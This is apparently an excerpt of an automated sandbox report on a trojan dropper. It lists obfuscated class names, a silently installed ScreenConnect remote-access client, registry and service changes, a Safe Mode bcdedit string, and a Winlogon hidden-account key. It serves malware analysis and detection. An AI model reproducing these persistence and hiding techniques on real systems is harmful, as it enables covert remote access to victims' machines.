                        Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.3848c18.2.raw.unpack, dsUdPXhp5sK8qnlF2Z8.csHigh entropy of concatenated method names: 'hu9IREyIUh7b9tqrTwH', 'q5tdLTJOCx538rWyVxP', 'GAyvJAV3BqIFycyTBhK', 'LII6FqpHgazlxktlAO3', 'JcWQpZU9DeZrpN3z0XO', 'AvF7gTZZ984KiKpgVQE', 'clk2pToYFRt1nb6AAUj', '_6fjYweCLJHPkRTYeZuV', 'P9pDEcOMz199mTqUmf7', 'w6AGO8ujJxryr9R3Yl8'
                        Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.3848c18.2.raw.unpack, tLU2VSaMPJVr9yYF210.csHigh entropy of concatenated method names: '_8Dv9Vs0yYdsXpix8YZ5', '_33mfWWmtXmIFlbwYjbP', 'fyV6ElXjQFVoD7Yg3kF', '_0BDIFbEntewBARUJ4AW', 'fqIvHQf6rAwJUitJOP8', '_95cb8wIZ0IiuEdW06pv', 'vofk0Ebiv5msx02tB68', 'ANjcVj4YuJXZH1VS6tu', 'i7usY4bVPNyXwaMZ5Ju', 's0jWpDKqEC1xDlifl9S'
                        Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.3848c18.2.raw.unpack, 5XWegNUSYQmoH9YsXWwL3Z5IjscWBkw0lURjMwsQ9tAyS4PHWjw.csHigh entropy of concatenated method names: 'LWDWjlJsqySwJDhxKwnA1ob1nnOruYHv9gzUB79qBivHrjTnney', 'Y0VjIJJmphFLtNgnVRlJtkb6Zvac4d8CsGISBXZvh4UUkyJFWZK', 'rC50bPsbhHc', 'ZCzCuMnDJHI', 'dNNMngHzGun', 'KkeGQAswrfy'
                        Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.3848c18.2.raw.unpack, 9mKnnIJtPQLqnwuwN1X.csHigh entropy of concatenated method names: 'eWyI97yyAY8tIl80q4N', '_1dQrlFoEc0nmRImvsgz', '_0cHWb2aV6xgzjJsjWcI', 'Q5p8BUNetdTWjQBMuQe', 'xZLnEQZRC0RP8JfNkXV', 'EV5O9Od9dWdTAgnAIFf', 'Hcv1gbLjQkP5jymonLm', '_46t0mKTweJXPdiP4vnI', 'DmQzLGXanTZDm5YW6W5t3kBYYhBr81G4QE92ZruwFYaHVASOM5T', '_81I9aQAGvNUhA6REsbvamffB0q2JhjBD4Poo3E4Kv3xJdmaKzK1'
                        Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.3848c18.2.raw.unpack, xlOlMInMQpmeBLv2Td7q6lNkfsP2MFkqfuNevjXRwqob1nCSpZW.csHigh entropy of concatenated method names: 'zHqvhuLG3DMOxlZdsTXjrI8UgLF7nmFNxZLihWZnWCXahOtHf0U', 'iMWGDPZByTOs606Zhm1RtdYkO4BkCLldZDD1INwoNnlFpui3dVU', 'xGnaDo0bmxRAlqiv1AKIb2U13PWHwEAKXVU0alG8Kn47vh5P8gY', 'hWr0UVh8hAMIAlHTTh7zBHwmMBHpI9Xn2Bnxy5dG80yQoq2l4ic', 'YAZvi16fJEn', '_3f2Tt8ab2V3', 'vyuWNSKG9jS', 'rQMkjoOKIcj', 'hdA0o0L81xT', '_9nXD0KODXut'
                        Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.raw.unpack, ipQBGHtOli8FsdvUrICHUQGCaKXp4kZTzUvcHh0kSfN96VRQKcE.csHigh entropy of concatenated method names: 'pat8Jmb6Y3fVcrPtL1Z4Geu2isETsDV2vCvSXt7Mg6i29bkYoh5', '_9LqgpCT0wm8b8wMEwuxQSLp7cNVNA2rkOYUEtOQu4YBBcNSdPME', 'WIl9K3WqOPWOcIYEfxMtSAh1HbUmrzbaLurxMvynPc32WtcmiTj', 'a5kzdzg3HLQ', 'Ht3WasYKPuj', 'pnyv45Hy8LS', 'eUKfGQ0ryft', '_2ZyucE7JLEh', '_6DsE6k9MkQE', 'CLgQaZa1q5v'
                        Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.raw.unpack, aOY1LHkSxcz7bCNxQCW.csHigh entropy of concatenated method names: 'WxXahuCOFEVUX8YwHBXgUzre8PPvZOccVGWnV', 'udJnGVG5BX8a0x17De5vjBisXASL4It0rpgad', 'f4P382k0bLtGwSaO4LWwtjLcqFEJweaLp8QR7', '_533lYKmbIIoU0cbbDLfDd8kxGQT2GmNBJwCjD'
                        Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.raw.unpack, ZCpsIWfDS7AkpK9SKjuwhH4KkL4LSGD6th7sJ2hAa0ZVEq51hCmhMVSafkw7M38e5XZLdMicldIn7.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'ZYOKKT5w3GBHY4kJne8wizAtzWeXZgDGGuLUC', '_9dlIsfrCf1uOpOVJYiWUu49AQOhS4OiQ16y4W', 'PvbdRdJbGx4288CxPeLwEkTqpsm7pB2BGNFZq', 'aaZGIVo6wJtASEnwPZ9Sy1qATExnWIlI0tA1j'
                        Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.raw.unpack, yNOK9yy0EKNGljbHJy5.csHigh entropy of concatenated method names: 'HmKj8f2UpIC4WXD6cga', 'ekkHJ3mmuD9PGoANEu1', 'idLGquPdixZnDbopEyB', 'mTRqbYcTSOZyBbB5FeH', 'YyGs8eE9dPBhF3MiPv9', 'bmgAcruG4jlqHQTwrvy', 'wpTgTsMVrYjXW16ueio', 'ndiNw4k0g7M1AMgqMhk', 'UPo6MGr04FyiFQxxqTz', 'aBOp4u9COf4kMyc6NNq'
                        Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.raw.unpack, R6ucxiO1Ll9Uiqd2r7r.csHigh entropy of concatenated method names: '_2DLzGtrM3rdImQqlpGK', 'R53XZECzmMWs6gnGM3H', 'JNTme6KWPk1e3Hl5ynq', 'k5EjjSL9ZIpNjValRcPI73Fx3HbJWJxdYSNjMpg6XT7c8TqhEU6FJM9qgqrxtFJkj2Y7V', 'XuxW4ZTdl5WlSDTTMKnxDhSVuPoCC8rroUUhOohbm8nWBXeV6sGnksKuARPDdV2x9zAq2', 'qXSc4n77SNw94UtawAlPPdHxkPJpxdy14TQRZ7CiJ1QMVU2YmQM703BdtZrKSFk7lPy5f', 'XjYcSsOuP4PnE1LxjSQ80zukitMlsHPeoR0Ua0K0dwXMYSr7JptKNEApoJhkmk4zM9n3m', 'yKwussRCHNLBnDyfF2elQQ99RkoBIFN9mU5BoD7UMdAUQ3Vwqr6TCRP5bHPwzdgyRk9yU', 'AtWYBfFnnwqCRxvYCTGWRtwHT2zQy3E1TATaP1R1IqvgKt44cx8fQLupK0iVG7lySsoy0', 'XxCPjcMW4umdDOse8GoyFMrGJn1MpBAEePzdcnMp9t8US7KMhFK63tUwml7flJepB3sX4'
                        Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.raw.unpack, bBpHSt10PQXanEg3s65.csHigh entropy of concatenated method names: 'njbTfylSdh3DVkASU8B', 'wRFqwzdmUb398NB0tjqKIKNj3HO0IRF4iM5ueNx4DY2RemWHOJLVvukBwaV7YCprtAJzT', '_9HUcVNIFqE5V4cBpmXXwSZJOXL1J4NkPrXWnqLt2jShO2LxV93cnJK1c3UMCWuEUp088A', 'iVajpGwq8QPObtQWs2QCLAm774ZD5AiXepguxghvobo5ckcWCzHt3njKFDd5C2H1MvLP8', 'zPns4ysKQVFejKfpplQBYHFBQDHmuYYH1V8YnTlEWuPtnaT19ycSING03dCltijQTOyHG'
                        Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.raw.unpack, j54ItegcQELkUHHWvLXCkSZQWEwmRksmYFQFOm2KcrwK8BMVEqu.csHigh entropy of concatenated method names: 'lMhAN6ieJ9Gj270e3d8l6EuzAUMBNqU7e0PkHcPWsXpFDOT4aDU', 'pITcJHMfLgAJyx2Plpdek5MwZq8QVL1NSfSte1xuToKigzfYhcM', 'X1N6QbUIdblD5ej3yrD1RpCoqH3zqdiwRAenKuHF2kj5bOgN27i', 'jQQEALPZoWpqfBYUXcnOJYScRP9IKN6eaMSmYGZcGsuIJwFxqBz', 'SF1GVCK8i8RGOjTFnFTwxYgNFLa4bV4oZBDmuyRSJlNPAXhbCZf', 'WsJcizhaoEcEAhJ4UE3sbrrsyBWJUV9y6ZYWGIf3N1eRJ9ENYmy', 'OfJY8JSodSrSeYJVXlHsLlQEvNdYYECBtYFnHnaB2zBsSsgpRxo', 'U5WHrHeluK7MpFqfL1PH9OkYhID0nZvE5eZY900wzHRUCc8kDrQ', 'dLy8Y9KJmGOzLl60X5AyBd0RXwBeExMJjcoGfhAc8mbTMzjaMX4', 'Kb3IrrhexuigkuRmIfSWyqQNvWLa6DxOfV0kOrcSu8XB8BytlEB'
                        Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.raw.unpack, dsUdPXhp5sK8qnlF2Z8.csHigh entropy of concatenated method names: 'hu9IREyIUh7b9tqrTwH', 'q5tdLTJOCx538rWyVxP', 'GAyvJAV3BqIFycyTBhK', 'LII6FqpHgazlxktlAO3', 'JcWQpZU9DeZrpN3z0XO', 'AvF7gTZZ984KiKpgVQE', 'clk2pToYFRt1nb6AAUj', '_6fjYweCLJHPkRTYeZuV', 'P9pDEcOMz199mTqUmf7', 'w6AGO8ujJxryr9R3Yl8'
                        Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.raw.unpack, tLU2VSaMPJVr9yYF210.csHigh entropy of concatenated method names: '_8Dv9Vs0yYdsXpix8YZ5', '_33mfWWmtXmIFlbwYjbP', 'fyV6ElXjQFVoD7Yg3kF', '_0BDIFbEntewBARUJ4AW', 'fqIvHQf6rAwJUitJOP8', '_95cb8wIZ0IiuEdW06pv', 'vofk0Ebiv5msx02tB68', 'ANjcVj4YuJXZH1VS6tu', 'i7usY4bVPNyXwaMZ5Ju', 's0jWpDKqEC1xDlifl9S'
                        Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.raw.unpack, 5XWegNUSYQmoH9YsXWwL3Z5IjscWBkw0lURjMwsQ9tAyS4PHWjw.csHigh entropy of concatenated method names: 'LWDWjlJsqySwJDhxKwnA1ob1nnOruYHv9gzUB79qBivHrjTnney', 'Y0VjIJJmphFLtNgnVRlJtkb6Zvac4d8CsGISBXZvh4UUkyJFWZK', 'rC50bPsbhHc', 'ZCzCuMnDJHI', 'dNNMngHzGun', 'KkeGQAswrfy'
                        Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.raw.unpack, 9mKnnIJtPQLqnwuwN1X.csHigh entropy of concatenated method names: 'eWyI97yyAY8tIl80q4N', '_1dQrlFoEc0nmRImvsgz', '_0cHWb2aV6xgzjJsjWcI', 'Q5p8BUNetdTWjQBMuQe', 'xZLnEQZRC0RP8JfNkXV', 'EV5O9Od9dWdTAgnAIFf', 'Hcv1gbLjQkP5jymonLm', '_46t0mKTweJXPdiP4vnI', 'DmQzLGXanTZDm5YW6W5t3kBYYhBr81G4QE92ZruwFYaHVASOM5T', '_81I9aQAGvNUhA6REsbvamffB0q2JhjBD4Poo3E4Kv3xJdmaKzK1'
                        Source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.raw.unpack, xlOlMInMQpmeBLv2Td7q6lNkfsP2MFkqfuNevjXRwqob1nCSpZW.csHigh entropy of concatenated method names: 'zHqvhuLG3DMOxlZdsTXjrI8UgLF7nmFNxZLihWZnWCXahOtHf0U', 'iMWGDPZByTOs606Zhm1RtdYkO4BkCLldZDD1INwoNnlFpui3dVU', 'xGnaDo0bmxRAlqiv1AKIb2U13PWHwEAKXVU0alG8Kn47vh5P8gY', 'hWr0UVh8hAMIAlHTTh7zBHwmMBHpI9Xn2Bnxy5dG80yQoq2l4ic', 'YAZvi16fJEn', '_3f2Tt8ab2V3', 'vyuWNSKG9jS', 'rQMkjoOKIcj', 'hdA0o0L81xT', '_9nXD0KODXut'

                        Persistence and Installation Behavior

                        barindex
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log
                        Source: c:\program files (x86)\screenconnect client (37ec872757ed9eb0)\screenconnect.windowscredentialprovider.dllCOM Object registered for dropped file: hkey_local_machine\software\classes\clsid\{6ff59a85-bc37-4cd4-28a0-8d1ad2bb7546}\inprocserver32
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsFileManager.exeJump to dropped file
                        Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI41FF.tmp-\Microsoft.Deployment.Compression.dllJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exeJump to dropped file
                        Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI41FF.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dllJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeJump to dropped file
                        Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI41FF.tmp-\Microsoft.Deployment.Compression.Cab.dllJump to dropped file
                        Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI41FF.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSI41FF.tmpJump to dropped file
                        Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI41FF.tmp-\ScreenConnect.Core.dllJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.Core.dllJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.Windows.dllJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsCredentialProvider.dllJump to dropped file
                        Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI41FF.tmp-\ScreenConnect.Windows.dllJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.Client.dllJump to dropped file
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeFile created: C:\Users\user\AppData\Roaming\XClient.exeJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.dllJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                        Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI41FF.tmp-\ScreenConnect.InstallerActions.dllJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsAuthenticationPackage.dllJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI475F.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI49E0.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI475F.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI49E0.tmpJump to dropped file
                        Source: ScreenConnect.ClientService.dll.4.drBinary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\ApplicationJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (37ec872757ed9eb0)Jump to behavior

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Source: rundll32.exe, 00000006.00000003.1251273476.0000000004BCA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                        Source: ScreenConnect.WindowsClient.exe, 00000010.00000002.2476011004.0000000003171000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                        Source: ScreenConnect.WindowsClient.exe, 00000013.00000002.1345183979.000000001B092000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                        Source: ScreenConnect.WindowsClient.exe, 00000013.00000002.1340922647.0000000002761000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                        Source: ScreenConnect.WindowsClient.exe, 00000013.00000002.1347089184.000000001B6B2000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                        Source: ScreenConnect.WindowsClient.exe, 00000013.00000002.1340770610.0000000000D80000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                        Source: ScreenConnect.Windows.dll.6.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                        Source: ScreenConnect.ClientService.dll.4.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                        Source: ScreenConnect.Windows.dll.4.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
